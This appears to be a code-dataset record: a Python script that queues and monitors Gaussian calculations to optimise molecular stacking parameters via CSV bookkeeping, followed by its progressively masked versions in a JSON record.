E_list=get_E(log_filepath)
if len(E_list)!=5:
continue
else:
len_queue-=1;machine_type_list.remove(machine_type)
Ei0,Eip1,Eip2,Eit1,Eit2=map(float,E_list)
Eit3 = Eit2; Eit4 = Eit1
try:
Ep, Et = df_step2[(df_step2['A1']==A1)&(df_step2['A2']==A2)&(df_step2['theta']==theta)&(df_step2['a']==a)&(df_step2['b']==b)][['E_p','E_t']].values[0]
except IndexError:
inner_params_dict = {"A1":A1,"A2":A2,"a":a,"b":b,"theta":theta,'cx':0,'cy':0,'cz':0}
inner_file_name = exec_gjf(auto_dir, monomer_name, inner_params_dict, machine_type,isInterlayer=False,isTest=isTest)
time.sleep(200)#1:40で1計算終わる
is_inner_over = False
while not(is_inner_over):
time.sleep(30)#1:40で1計算終わる
E_inner_list=get_E(inner_file_name)
is_inner_over = len(E_inner_list)==2
Ep, Et=map(float,E_inner_list)
df_newline = pd.Series({**inner_params_dict,'E':2*Ep+4*Et,'E_p':Ep,'E_t':Et,'machine_type':machine_type,'status':'Done','file_name':inner_file_name})
df_step2=df_step2.append(df_newline,ignore_index=True)
df_step2.to_csv(auto_step2_csv,index=False)
E = 4*Et + 2*Ep + 2*(Ei0 + Eip1+ Eip2 + Eit1 + Eit2 + Eit3 + Eit4)
df_E.loc[idx, ['E_p','E_t','E_i0','E_ip1','E_ip2','E_it1','E_it2','E_it3','E_it4','E','status']] = [Ep,Et,Ei0,Eip1,Eip2,Eit1,Eit2,Eit3,Eit4,E,'Done']
df_E.to_csv(auto_csv,index=False)
break#2つ同時に計算終わったりしたらまずいので一個で切る
isAvailable = len_queue < num_nodes
machine2IsFull = machine_type_list.count(2) >= maxnum_machine2
machine_type = 1 if machine2IsFull else 2
if isAvailable:
params_dict = get_params_dict(auto_dir,num_nodes, fixed_param_keys, opt_param_keys, monomer_name)
if len(params_dict)!=0:#終わりがまだ見えないなら
alreadyCalculated = check_calc_status(auto_dir,params_dict)
if not(alreadyCalculated):
file_name = exec_gjf(auto_dir, monomer_name, {**params_dict}, machine_type,isInterlayer=True,isTest=isTest)
df_newline = pd.Series({**params_dict,'E':0.,'E_p':0.,'E_t':0.,'E_i0':0.,'E_ip1':0.,'E_ip2':0.,'E_it1':0.,'E_it2':0.,'E_it3':0.,'E_it4':0.,'machine_type':machine_type,'status':'InProgress','file_name':file_name})
df_E=df_E.append(df_newline,ignore_index=True)
df_E.to_csv(auto_csv,index=False)
init_params_csv=os.path.join(auto_dir, 'step3-twist_init_params.csv')
df_init_params = pd.read_csv(init_params_csv)
df_init_params_done = filter_df(df_init_params,{'status':'Done'})
isOver = True if len(df_init_params_done)==len(df_init_params) else False
return isOver
def check_calc_status(auto_dir,params_dict):
df_E= pd.read_csv(os.path.join(auto_dir,'step3-twist.csv'))
if len(df_E)==0:
return False
df_E_filtered = filter_df(df_E, params_dict)
df_E_filtered = df_E_filtered.reset_index(drop=True)
try:
status = get_values_from_df(df_E_filtered,0,'status')
return status=='Done'
except KeyError:
return False
def get_params_dict(auto_dir, num_nodes, fixed_param_keys, opt_param_keys, monomer_name):
"""
前提:
step3-twist_init_params.csvとstep3-twist.csvがauto_dirの下にある
"""
init_params_csv=os.path.join(auto_dir, 'step3-twist_init_params.csv')
df_init_params = pd.read_csv(init_params_csv)
df_cur = pd.read_csv(os.path.join(auto_dir, 'step3-twist.csv'))
df_init_params_inprogress = df_init_params[df_init_params['status']=='InProgress']
#最初の立ち上がり時
if len(df_init_params_inprogress) < num_nodes:
df_init_params_notyet = df_init_params[df_init_params['status']=='NotYet']
for index in df_init_params_notyet.index:
df_init_params = update_value_in_df(df_init_params,index,'status','InProgress')
df_init_params.to_csv(init_params_csv,index=False)
params_dict = df_init_params.loc[index,fixed_param_keys+opt_param_keys].to_dict()
return params_dict
for index in df_init_params.index:
df_init_params = pd.read_csv(init_params_csv)
init_params_dict = df_init_params.loc[index,fixed_param_keys+opt_param_keys].to_dict()
fixed_params_dict = df_init_params.loc[index,fixed_param_keys].to_dict()
isDone, opt_params_dict = get_opt_params_dict(df_cur, init_params_dict,fixed_params_dict, monomer_name)
if isDone:
# df_init_paramsのstatusをupdate
df_init_params = update_value_in_df(df_init_params,index,'status','Done')
if np.max(df_init_params.index) < index+1:
status = 'Done'
else:
status = get_values_from_df(df_init_params,index+1,'status')
df_init_params.to_csv(init_params_csv,index=False)
if status=='NotYet':
opt_params_dict = get_values_from_df(df_init_params,index+1,opt_param_keys)
df_init_params = update_value_in_df(df_init_params,index+1,'status','InProgress')
df_init_params.to_csv(init_params_csv,index=False)
return {**fixed_params_dict,**opt_params_dict}
else:
continue
else:
df_inprogress = filter_df(df_cur, {**fixed_params_dict,**opt_params_dict,'status':'InProgress'})
if len(df_inprogress)>=1:
continue
return {**fixed_params_dict,**opt_params_dict}
return {}
def get_opt_params_dict(df_cur, init_params_dict,fixed_params_dict, monomer_name):
df_val = filter_df(df_cur, fixed_params_dict)
a_init_prev = init_params_dict['a']; b_init_prev = init_params_dict['b']; theta_init_prev = init_params_dict['theta']
A1 = init_params_dict['A1']; A2 = init_params_dict['A2']
while True:
E_list=[];heri_list=[]
for a in [a_init_prev-0.1,a_init_prev,a_init_prev+0.1]:
for b in [b_init_prev-0.1,b_init_prev,b_init_prev+0.1]:
a = np.round(a,1);b = np.round(b,1)
for theta in [theta_init_prev-0.5,theta_init_prev,theta_init_prev+0.5]:
df_val_ab = df_val[
(df_val['a']==a)&(df_val['b']==b)&(df_val['theta']==theta)&
(df_val['A1']==A1)&(df_val['A2']==A2)&
(df_val['status']=='Done')
]
if len(df_val_ab)==0:
cx, cy, cz = get_c_vec_vdw(monomer_name,A1,A2,a,b,theta)
cx, cy, cz = np.round(cx,1), np.round(cy,1), np.round(cz,1)
return False,{'a':a,'b':b,'theta':theta, "cx":cx, "cy":cy, "cz":cz }
heri_list.append([a,b,theta]);E_list.append(df_val_ab['E'].values[0])
a_init,b_init,theta_init = heri_list[np.argmin(np.array(E_list))]
if a_init==a_init_prev and b_init==b_init_prev and theta_init==theta_init_prev:
cx, cy, cz = get_c_vec_vdw(monomer_name,A1,A2,a_init,b_init,theta_init)
cx, cy, cz = np.round(cx,1), np.round(cy,1), np.round(cz,1)
return True,{'a':a_init,'b':b_init, 'theta':theta_init, "cx":cx, "cy":cy, "cz":cz }
else:
a_init_prev=a_init;b_init_prev=b_init;theta_init_prev=theta_init
def get_values_from_df(df,index,key):
return df.loc[index,key]
def update_value_in_df(df,index,key,value):
df.loc[index,key]=value
return df
def filter_df(df, dict_filter):
query = []
for k, v in dict_filter.items():
if type(v)==str:
query.append('{} == "{}"'.format(k,v))
else:
query.append('{} == {}'.format(k,v))
df_filtered = df.query(' and '.join(query))
return df_filtered
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--init',action='store_true')
parser.add_argument('--isTest',action='store_true')
parser.add_argument('--auto-dir',type=str,help='path to dir which includes gaussian, gaussview and csv')
parser.add_argument('--monomer-name',type=str,help='monomer name')
parser.add_argument('--num-nodes',type=int,help='num nodes')
args = parser.parse_args()
if args.init:
print("----initial process----")
init_process(args)
print("----main process----")
main_process(args)
print("----finish process----")
|
normal
|
{
"blob_id": "961bda96e433bb66d592ad1e99c92db0a9ab9fe9",
"index": 8545,
"step-1": "<mask token>\n\n\ndef init_process(args):\n auto_dir = args.auto_dir\n monomer_name = args.monomer_name\n os.makedirs(os.path.join(auto_dir, 'gaussian'), exist_ok=True)\n os.makedirs(os.path.join(auto_dir, 'gaussview'), exist_ok=True)\n\n def get_init_para_csv(auto_dir, monomer_name):\n init_params_csv = os.path.join(auto_dir, 'step3-twist_init_params.csv')\n df = pd.read_csv(\n '/home/koyama/Working/interaction/{}/step2-twist/step2-twist_min.csv'\n .format(monomer_name))\n df = df[(df['A2'] == 32) & (df['A1'] <= 0) & (df['A1'] >= -20) & (\n df['theta'] > 45)]\n inner_zip = df[['a', 'b', 'theta', 'A1', 'A2']].values\n print(inner_zip)\n init_para_list = []\n for a, b, theta, A1, A2 in tqdm(inner_zip):\n c = get_c_vec_vdw(monomer_name, A1, A2, a, b, theta)\n init_para_list.append([np.round(a, 1), np.round(b, 1), theta,\n A1, A2, np.round(c[0], 1), np.round(c[1], 1), np.round(c[2],\n 1), 'NotYet'])\n df_init_params = pd.DataFrame(np.array(init_para_list), columns=[\n 'a', 'b', 'theta', 'A1', 'A2', 'cx', 'cy', 'cz', 'status'])\n df_init_params.to_csv(init_params_csv, index=False)\n get_init_para_csv(auto_dir, monomer_name)\n auto_csv_path = os.path.join(auto_dir, 'step3-twist.csv')\n if not os.path.exists(auto_csv_path):\n df_E = pd.DataFrame(columns=['a', 'b', 'theta', 'A1', 'A2', 'cx',\n 'cy', 'cz', 'E', 'E_p', 'E_t', 'machine_type', 'status',\n 'file_name'])\n else:\n df_E = pd.read_csv(auto_csv_path)\n df_E = df_E[df_E['status'] != 'InProgress']\n df_E.to_csv(auto_csv_path, index=False)\n df_init = pd.read_csv(os.path.join(auto_dir, 'step3-twist_init_params.csv')\n )\n df_init['status'] = 'NotYet'\n df_init.to_csv(os.path.join(auto_dir, 'step3-twist_init_params.csv'),\n index=False)\n\n\ndef main_process(args):\n os.chdir(os.path.join(args.auto_dir, 'gaussian'))\n isOver = False\n while not isOver:\n isOver = listen(args)\n time.sleep(1)\n\n\n<mask token>\n\n\ndef update_value_in_df(df, index, key, value):\n df.loc[index, key] = value\n return df\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef init_process(args):\n auto_dir = args.auto_dir\n monomer_name = args.monomer_name\n os.makedirs(os.path.join(auto_dir, 'gaussian'), exist_ok=True)\n os.makedirs(os.path.join(auto_dir, 'gaussview'), exist_ok=True)\n\n def get_init_para_csv(auto_dir, monomer_name):\n init_params_csv = os.path.join(auto_dir, 'step3-twist_init_params.csv')\n df = pd.read_csv(\n '/home/koyama/Working/interaction/{}/step2-twist/step2-twist_min.csv'\n .format(monomer_name))\n df = df[(df['A2'] == 32) & (df['A1'] <= 0) & (df['A1'] >= -20) & (\n df['theta'] > 45)]\n inner_zip = df[['a', 'b', 'theta', 'A1', 'A2']].values\n print(inner_zip)\n init_para_list = []\n for a, b, theta, A1, A2 in tqdm(inner_zip):\n c = get_c_vec_vdw(monomer_name, A1, A2, a, b, theta)\n init_para_list.append([np.round(a, 1), np.round(b, 1), theta,\n A1, A2, np.round(c[0], 1), np.round(c[1], 1), np.round(c[2],\n 1), 'NotYet'])\n df_init_params = pd.DataFrame(np.array(init_para_list), columns=[\n 'a', 'b', 'theta', 'A1', 'A2', 'cx', 'cy', 'cz', 'status'])\n df_init_params.to_csv(init_params_csv, index=False)\n get_init_para_csv(auto_dir, monomer_name)\n auto_csv_path = os.path.join(auto_dir, 'step3-twist.csv')\n if not os.path.exists(auto_csv_path):\n df_E = pd.DataFrame(columns=['a', 'b', 'theta', 'A1', 'A2', 'cx',\n 'cy', 'cz', 'E', 'E_p', 'E_t', 'machine_type', 'status',\n 'file_name'])\n else:\n df_E = pd.read_csv(auto_csv_path)\n df_E = df_E[df_E['status'] != 'InProgress']\n df_E.to_csv(auto_csv_path, index=False)\n df_init = pd.read_csv(os.path.join(auto_dir, 'step3-twist_init_params.csv')\n )\n df_init['status'] = 'NotYet'\n df_init.to_csv(os.path.join(auto_dir, 'step3-twist_init_params.csv'),\n index=False)\n\n\ndef main_process(args):\n os.chdir(os.path.join(args.auto_dir, 'gaussian'))\n isOver = False\n while not isOver:\n isOver = listen(args)\n time.sleep(1)\n\n\ndef listen(args):\n auto_dir = args.auto_dir\n monomer_name = args.monomer_name\n num_nodes = args.num_nodes\n isTest = args.isTest\n fixed_param_keys = ['A1', 'A2']\n opt_param_keys = ['a', 'b', 'theta', 'cx', 'cy', 'cz']\n auto_step2_csv = (\n '/home/koyama/Working/interaction/{}/step2-twist/step2-twist.csv'.\n format(monomer_name))\n df_step2 = pd.read_csv(auto_step2_csv)\n auto_csv = os.path.join(auto_dir, 'step3-twist.csv')\n df_E = pd.read_csv(auto_csv)\n df_queue = df_E.loc[df_E['status'] == 'InProgress', ['machine_type',\n 'file_name', 'A1', 'A2', 'a', 'b', 'theta', 'cx', 'cy', 'cz']]\n machine_type_list = df_queue['machine_type'].values.tolist()\n len_queue = len(df_queue)\n maxnum_machine2 = 3\n for idx, row in zip(df_queue.index, df_queue.values):\n machine_type, file_name, A1, A2, a, b, theta, cx, cy, cz = row\n log_filepath = os.path.join(*[auto_dir, 'gaussian', file_name])\n if not os.path.exists(log_filepath):\n continue\n E_list = get_E(log_filepath)\n if len(E_list) != 5:\n continue\n else:\n len_queue -= 1\n machine_type_list.remove(machine_type)\n Ei0, Eip1, Eip2, Eit1, Eit2 = map(float, E_list)\n Eit3 = Eit2\n Eit4 = Eit1\n try:\n Ep, Et = df_step2[(df_step2['A1'] == A1) & (df_step2['A2'] ==\n A2) & (df_step2['theta'] == theta) & (df_step2['a'] ==\n a) & (df_step2['b'] == b)][['E_p', 'E_t']].values[0]\n except IndexError:\n inner_params_dict = {'A1': A1, 'A2': A2, 'a': a, 'b': b,\n 'theta': theta, 'cx': 0, 'cy': 0, 'cz': 0}\n inner_file_name = exec_gjf(auto_dir, monomer_name,\n inner_params_dict, machine_type, isInterlayer=False,\n isTest=isTest)\n time.sleep(200)\n is_inner_over = False\n while not is_inner_over:\n time.sleep(30)\n E_inner_list = get_E(inner_file_name)\n is_inner_over = len(E_inner_list) == 2\n Ep, Et = map(float, E_inner_list)\n df_newline = pd.Series({**inner_params_dict, 'E': 2 * Ep + \n 4 * Et, 'E_p': Ep, 'E_t': Et, 'machine_type':\n machine_type, 'status': 'Done', 'file_name':\n inner_file_name})\n df_step2 = df_step2.append(df_newline, ignore_index=True)\n df_step2.to_csv(auto_step2_csv, index=False)\n E = 4 * Et + 2 * Ep + 2 * (Ei0 + Eip1 + Eip2 + Eit1 + Eit2 +\n Eit3 + Eit4)\n df_E.loc[idx, ['E_p', 'E_t', 'E_i0', 'E_ip1', 'E_ip2', 'E_it1',\n 'E_it2', 'E_it3', 'E_it4', 'E', 'status']] = [Ep, Et, Ei0,\n Eip1, Eip2, Eit1, Eit2, Eit3, Eit4, E, 'Done']\n df_E.to_csv(auto_csv, index=False)\n break\n isAvailable = len_queue < num_nodes\n machine2IsFull = machine_type_list.count(2) >= maxnum_machine2\n machine_type = 1 if machine2IsFull else 2\n if isAvailable:\n params_dict = get_params_dict(auto_dir, num_nodes, fixed_param_keys,\n opt_param_keys, monomer_name)\n if len(params_dict) != 0:\n alreadyCalculated = check_calc_status(auto_dir, params_dict)\n if not alreadyCalculated:\n file_name = exec_gjf(auto_dir, monomer_name, {**params_dict\n }, machine_type, isInterlayer=True, isTest=isTest)\n df_newline = pd.Series({**params_dict, 'E': 0.0, 'E_p': 0.0,\n 'E_t': 0.0, 'E_i0': 0.0, 'E_ip1': 0.0, 'E_ip2': 0.0,\n 'E_it1': 0.0, 'E_it2': 0.0, 'E_it3': 0.0, 'E_it4': 0.0,\n 'machine_type': machine_type, 'status': 'InProgress',\n 'file_name': file_name})\n df_E = df_E.append(df_newline, ignore_index=True)\n df_E.to_csv(auto_csv, index=False)\n init_params_csv = os.path.join(auto_dir, 'step3-twist_init_params.csv')\n df_init_params = pd.read_csv(init_params_csv)\n df_init_params_done = filter_df(df_init_params, {'status': 'Done'})\n isOver = True if len(df_init_params_done) == len(df_init_params) else False\n return isOver\n\n\ndef check_calc_status(auto_dir, params_dict):\n df_E = pd.read_csv(os.path.join(auto_dir, 'step3-twist.csv'))\n if len(df_E) == 0:\n return False\n df_E_filtered = filter_df(df_E, params_dict)\n df_E_filtered = df_E_filtered.reset_index(drop=True)\n try:\n status = get_values_from_df(df_E_filtered, 0, 'status')\n return status == 'Done'\n except KeyError:\n return False\n\n\ndef get_params_dict(auto_dir, num_nodes, fixed_param_keys, opt_param_keys,\n monomer_name):\n \"\"\"\n 前提:\n step3-twist_init_params.csvとstep3-twist.csvがauto_dirの下にある\n \"\"\"\n init_params_csv = os.path.join(auto_dir, 'step3-twist_init_params.csv')\n df_init_params = pd.read_csv(init_params_csv)\n df_cur = pd.read_csv(os.path.join(auto_dir, 'step3-twist.csv'))\n df_init_params_inprogress = df_init_params[df_init_params['status'] ==\n 'InProgress']\n if len(df_init_params_inprogress) < num_nodes:\n df_init_params_notyet = df_init_params[df_init_params['status'] ==\n 'NotYet']\n for index in df_init_params_notyet.index:\n df_init_params = update_value_in_df(df_init_params, index,\n 'status', 'InProgress')\n df_init_params.to_csv(init_params_csv, index=False)\n params_dict = df_init_params.loc[index, fixed_param_keys +\n opt_param_keys].to_dict()\n return params_dict\n for index in df_init_params.index:\n df_init_params = pd.read_csv(init_params_csv)\n init_params_dict = df_init_params.loc[index, fixed_param_keys +\n opt_param_keys].to_dict()\n fixed_params_dict = df_init_params.loc[index, fixed_param_keys\n ].to_dict()\n isDone, opt_params_dict = get_opt_params_dict(df_cur,\n init_params_dict, fixed_params_dict, monomer_name)\n if isDone:\n df_init_params = update_value_in_df(df_init_params, index,\n 'status', 'Done')\n if np.max(df_init_params.index) < index + 1:\n status = 'Done'\n else:\n status = get_values_from_df(df_init_params, index + 1, 'status'\n )\n df_init_params.to_csv(init_params_csv, index=False)\n if status == 'NotYet':\n opt_params_dict = get_values_from_df(df_init_params, index +\n 1, opt_param_keys)\n df_init_params = update_value_in_df(df_init_params, index +\n 1, 'status', 'InProgress')\n df_init_params.to_csv(init_params_csv, index=False)\n return {**fixed_params_dict, **opt_params_dict}\n else:\n continue\n else:\n df_inprogress = filter_df(df_cur, {**fixed_params_dict, **\n opt_params_dict, 'status': 'InProgress'})\n if len(df_inprogress) >= 1:\n continue\n return {**fixed_params_dict, **opt_params_dict}\n return {}\n\n\n<mask token>\n\n\ndef get_values_from_df(df, index, key):\n return df.loc[index, key]\n\n\ndef update_value_in_df(df, index, key, value):\n df.loc[index, key] = value\n return df\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef init_process(args):\n auto_dir = args.auto_dir\n monomer_name = args.monomer_name\n os.makedirs(os.path.join(auto_dir, 'gaussian'), exist_ok=True)\n os.makedirs(os.path.join(auto_dir, 'gaussview'), exist_ok=True)\n\n def get_init_para_csv(auto_dir, monomer_name):\n init_params_csv = os.path.join(auto_dir, 'step3-twist_init_params.csv')\n df = pd.read_csv(\n '/home/koyama/Working/interaction/{}/step2-twist/step2-twist_min.csv'\n .format(monomer_name))\n df = df[(df['A2'] == 32) & (df['A1'] <= 0) & (df['A1'] >= -20) & (\n df['theta'] > 45)]\n inner_zip = df[['a', 'b', 'theta', 'A1', 'A2']].values\n print(inner_zip)\n init_para_list = []\n for a, b, theta, A1, A2 in tqdm(inner_zip):\n c = get_c_vec_vdw(monomer_name, A1, A2, a, b, theta)\n init_para_list.append([np.round(a, 1), np.round(b, 1), theta,\n A1, A2, np.round(c[0], 1), np.round(c[1], 1), np.round(c[2],\n 1), 'NotYet'])\n df_init_params = pd.DataFrame(np.array(init_para_list), columns=[\n 'a', 'b', 'theta', 'A1', 'A2', 'cx', 'cy', 'cz', 'status'])\n df_init_params.to_csv(init_params_csv, index=False)\n get_init_para_csv(auto_dir, monomer_name)\n auto_csv_path = os.path.join(auto_dir, 'step3-twist.csv')\n if not os.path.exists(auto_csv_path):\n df_E = pd.DataFrame(columns=['a', 'b', 'theta', 'A1', 'A2', 'cx',\n 'cy', 'cz', 'E', 'E_p', 'E_t', 'machine_type', 'status',\n 'file_name'])\n else:\n df_E = pd.read_csv(auto_csv_path)\n df_E = df_E[df_E['status'] != 'InProgress']\n df_E.to_csv(auto_csv_path, index=False)\n df_init = pd.read_csv(os.path.join(auto_dir, 'step3-twist_init_params.csv')\n )\n df_init['status'] = 'NotYet'\n df_init.to_csv(os.path.join(auto_dir, 'step3-twist_init_params.csv'),\n index=False)\n\n\ndef main_process(args):\n os.chdir(os.path.join(args.auto_dir, 'gaussian'))\n isOver = False\n while not isOver:\n isOver = listen(args)\n time.sleep(1)\n\n\ndef listen(args):\n auto_dir = args.auto_dir\n monomer_name = args.monomer_name\n num_nodes = args.num_nodes\n isTest = args.isTest\n fixed_param_keys = ['A1', 'A2']\n opt_param_keys = ['a', 'b', 'theta', 'cx', 'cy', 'cz']\n auto_step2_csv = (\n '/home/koyama/Working/interaction/{}/step2-twist/step2-twist.csv'.\n format(monomer_name))\n df_step2 = pd.read_csv(auto_step2_csv)\n auto_csv = os.path.join(auto_dir, 'step3-twist.csv')\n df_E = pd.read_csv(auto_csv)\n df_queue = df_E.loc[df_E['status'] == 'InProgress', ['machine_type',\n 'file_name', 'A1', 'A2', 'a', 'b', 'theta', 'cx', 'cy', 'cz']]\n machine_type_list = df_queue['machine_type'].values.tolist()\n len_queue = len(df_queue)\n maxnum_machine2 = 3\n for idx, row in zip(df_queue.index, df_queue.values):\n machine_type, file_name, A1, A2, a, b, theta, cx, cy, cz = row\n log_filepath = os.path.join(*[auto_dir, 'gaussian', file_name])\n if not os.path.exists(log_filepath):\n continue\n E_list = get_E(log_filepath)\n if len(E_list) != 5:\n continue\n else:\n len_queue -= 1\n machine_type_list.remove(machine_type)\n Ei0, Eip1, Eip2, Eit1, Eit2 = map(float, E_list)\n Eit3 = Eit2\n Eit4 = Eit1\n try:\n Ep, Et = df_step2[(df_step2['A1'] == A1) & (df_step2['A2'] ==\n A2) & (df_step2['theta'] == theta) & (df_step2['a'] ==\n a) & (df_step2['b'] == b)][['E_p', 'E_t']].values[0]\n except IndexError:\n inner_params_dict = {'A1': A1, 'A2': A2, 'a': a, 'b': b,\n 'theta': theta, 'cx': 0, 'cy': 0, 'cz': 0}\n inner_file_name = exec_gjf(auto_dir, monomer_name,\n inner_params_dict, machine_type, isInterlayer=False,\n isTest=isTest)\n time.sleep(200)\n is_inner_over = False\n while not is_inner_over:\n time.sleep(30)\n E_inner_list = get_E(inner_file_name)\n is_inner_over = len(E_inner_list) == 2\n Ep, Et = map(float, E_inner_list)\n df_newline = pd.Series({**inner_params_dict, 'E': 2 * Ep + \n 4 * Et, 'E_p': Ep, 'E_t': Et, 'machine_type':\n machine_type, 'status': 'Done', 'file_name':\n inner_file_name})\n df_step2 = df_step2.append(df_newline, ignore_index=True)\n df_step2.to_csv(auto_step2_csv, index=False)\n E = 4 * Et + 2 * Ep + 2 * (Ei0 + Eip1 + Eip2 + Eit1 + Eit2 +\n Eit3 + Eit4)\n df_E.loc[idx, ['E_p', 'E_t', 'E_i0', 'E_ip1', 'E_ip2', 'E_it1',\n 'E_it2', 'E_it3', 'E_it4', 'E', 'status']] = [Ep, Et, Ei0,\n Eip1, Eip2, Eit1, Eit2, Eit3, Eit4, E, 'Done']\n df_E.to_csv(auto_csv, index=False)\n break\n isAvailable = len_queue < num_nodes\n machine2IsFull = machine_type_list.count(2) >= maxnum_machine2\n machine_type = 1 if machine2IsFull else 2\n if isAvailable:\n params_dict = get_params_dict(auto_dir, num_nodes, fixed_param_keys,\n opt_param_keys, monomer_name)\n if len(params_dict) != 0:\n alreadyCalculated = check_calc_status(auto_dir, params_dict)\n if not alreadyCalculated:\n file_name = exec_gjf(auto_dir, monomer_name, {**params_dict\n }, machine_type, isInterlayer=True, isTest=isTest)\n df_newline = pd.Series({**params_dict, 'E': 0.0, 'E_p': 0.0,\n 'E_t': 0.0, 'E_i0': 0.0, 'E_ip1': 0.0, 'E_ip2': 0.0,\n 'E_it1': 0.0, 'E_it2': 0.0, 'E_it3': 0.0, 'E_it4': 0.0,\n 'machine_type': machine_type, 'status': 'InProgress',\n 'file_name': file_name})\n df_E = df_E.append(df_newline, ignore_index=True)\n df_E.to_csv(auto_csv, index=False)\n init_params_csv = os.path.join(auto_dir, 'step3-twist_init_params.csv')\n df_init_params = pd.read_csv(init_params_csv)\n df_init_params_done = filter_df(df_init_params, {'status': 'Done'})\n isOver = True if len(df_init_params_done) == len(df_init_params) else False\n return isOver\n\n\ndef check_calc_status(auto_dir, params_dict):\n df_E = pd.read_csv(os.path.join(auto_dir, 'step3-twist.csv'))\n if len(df_E) == 0:\n return False\n df_E_filtered = filter_df(df_E, params_dict)\n df_E_filtered = df_E_filtered.reset_index(drop=True)\n try:\n status = get_values_from_df(df_E_filtered, 0, 'status')\n return status == 'Done'\n except KeyError:\n return False\n\n\ndef get_params_dict(auto_dir, num_nodes, fixed_param_keys, opt_param_keys,\n monomer_name):\n \"\"\"\n 前提:\n step3-twist_init_params.csvとstep3-twist.csvがauto_dirの下にある\n \"\"\"\n init_params_csv = os.path.join(auto_dir, 'step3-twist_init_params.csv')\n df_init_params = pd.read_csv(init_params_csv)\n df_cur = pd.read_csv(os.path.join(auto_dir, 'step3-twist.csv'))\n df_init_params_inprogress = df_init_params[df_init_params['status'] ==\n 'InProgress']\n if len(df_init_params_inprogress) < num_nodes:\n df_init_params_notyet = df_init_params[df_init_params['status'] ==\n 'NotYet']\n for index in df_init_params_notyet.index:\n df_init_params = update_value_in_df(df_init_params, index,\n 'status', 'InProgress')\n df_init_params.to_csv(init_params_csv, index=False)\n params_dict = df_init_params.loc[index, fixed_param_keys +\n opt_param_keys].to_dict()\n return params_dict\n for index in df_init_params.index:\n df_init_params = pd.read_csv(init_params_csv)\n init_params_dict = df_init_params.loc[index, fixed_param_keys +\n opt_param_keys].to_dict()\n fixed_params_dict = df_init_params.loc[index, fixed_param_keys\n ].to_dict()\n isDone, opt_params_dict = get_opt_params_dict(df_cur,\n init_params_dict, fixed_params_dict, monomer_name)\n if isDone:\n df_init_params = update_value_in_df(df_init_params, index,\n 'status', 'Done')\n if np.max(df_init_params.index) < index + 1:\n status = 'Done'\n else:\n status = get_values_from_df(df_init_params, index + 1, 'status'\n )\n df_init_params.to_csv(init_params_csv, index=False)\n if status == 'NotYet':\n opt_params_dict = get_values_from_df(df_init_params, index +\n 1, opt_param_keys)\n df_init_params = update_value_in_df(df_init_params, index +\n 1, 'status', 'InProgress')\n df_init_params.to_csv(init_params_csv, index=False)\n return {**fixed_params_dict, **opt_params_dict}\n else:\n continue\n else:\n df_inprogress = filter_df(df_cur, {**fixed_params_dict, **\n opt_params_dict, 'status': 'InProgress'})\n if len(df_inprogress) >= 1:\n continue\n return {**fixed_params_dict, **opt_params_dict}\n return {}\n\n\ndef get_opt_params_dict(df_cur, init_params_dict, fixed_params_dict,\n monomer_name):\n df_val = filter_df(df_cur, fixed_params_dict)\n a_init_prev = init_params_dict['a']\n b_init_prev = init_params_dict['b']\n theta_init_prev = init_params_dict['theta']\n A1 = init_params_dict['A1']\n A2 = init_params_dict['A2']\n while True:\n E_list = []\n heri_list = []\n for a in [a_init_prev - 0.1, a_init_prev, a_init_prev + 0.1]:\n for b in [b_init_prev - 0.1, b_init_prev, b_init_prev + 0.1]:\n a = np.round(a, 1)\n b = np.round(b, 1)\n for theta in [theta_init_prev - 0.5, theta_init_prev, \n theta_init_prev + 0.5]:\n df_val_ab = df_val[(df_val['a'] == a) & (df_val['b'] ==\n b) & (df_val['theta'] == theta) & (df_val['A1'] ==\n A1) & (df_val['A2'] == A2) & (df_val['status'] ==\n 'Done')]\n if len(df_val_ab) == 0:\n cx, cy, cz = get_c_vec_vdw(monomer_name, A1, A2, a,\n b, theta)\n cx, cy, cz = np.round(cx, 1), np.round(cy, 1\n ), np.round(cz, 1)\n return False, {'a': a, 'b': b, 'theta': theta, 'cx':\n cx, 'cy': cy, 'cz': cz}\n heri_list.append([a, b, theta])\n E_list.append(df_val_ab['E'].values[0])\n a_init, b_init, theta_init = heri_list[np.argmin(np.array(E_list))]\n if (a_init == a_init_prev and b_init == b_init_prev and theta_init ==\n theta_init_prev):\n cx, cy, cz = get_c_vec_vdw(monomer_name, A1, A2, a_init, b_init,\n theta_init)\n cx, cy, cz = np.round(cx, 1), np.round(cy, 1), np.round(cz, 1)\n return True, {'a': a_init, 'b': b_init, 'theta': theta_init,\n 'cx': cx, 'cy': cy, 'cz': cz}\n else:\n a_init_prev = a_init\n b_init_prev = b_init\n theta_init_prev = theta_init\n\n\ndef get_values_from_df(df, index, key):\n return df.loc[index, key]\n\n\ndef update_value_in_df(df, index, key, value):\n df.loc[index, key] = value\n return df\n\n\ndef filter_df(df, dict_filter):\n query = []\n for k, v in dict_filter.items():\n if type(v) == str:\n query.append('{} == \"{}\"'.format(k, v))\n else:\n query.append('{} == {}'.format(k, v))\n df_filtered = df.query(' and '.join(query))\n return df_filtered\n\n\n<mask token>\n",
"step-4": "<mask token>\nsys.path.append(os.path.join(os.environ['HOME'], 'Working/interaction/'))\n<mask token>\n\n\ndef init_process(args):\n auto_dir = args.auto_dir\n monomer_name = args.monomer_name\n os.makedirs(os.path.join(auto_dir, 'gaussian'), exist_ok=True)\n os.makedirs(os.path.join(auto_dir, 'gaussview'), exist_ok=True)\n\n def get_init_para_csv(auto_dir, monomer_name):\n init_params_csv = os.path.join(auto_dir, 'step3-twist_init_params.csv')\n df = pd.read_csv(\n '/home/koyama/Working/interaction/{}/step2-twist/step2-twist_min.csv'\n .format(monomer_name))\n df = df[(df['A2'] == 32) & (df['A1'] <= 0) & (df['A1'] >= -20) & (\n df['theta'] > 45)]\n inner_zip = df[['a', 'b', 'theta', 'A1', 'A2']].values\n print(inner_zip)\n init_para_list = []\n for a, b, theta, A1, A2 in tqdm(inner_zip):\n c = get_c_vec_vdw(monomer_name, A1, A2, a, b, theta)\n init_para_list.append([np.round(a, 1), np.round(b, 1), theta,\n A1, A2, np.round(c[0], 1), np.round(c[1], 1), np.round(c[2],\n 1), 'NotYet'])\n df_init_params = pd.DataFrame(np.array(init_para_list), columns=[\n 'a', 'b', 'theta', 'A1', 'A2', 'cx', 'cy', 'cz', 'status'])\n df_init_params.to_csv(init_params_csv, index=False)\n get_init_para_csv(auto_dir, monomer_name)\n auto_csv_path = os.path.join(auto_dir, 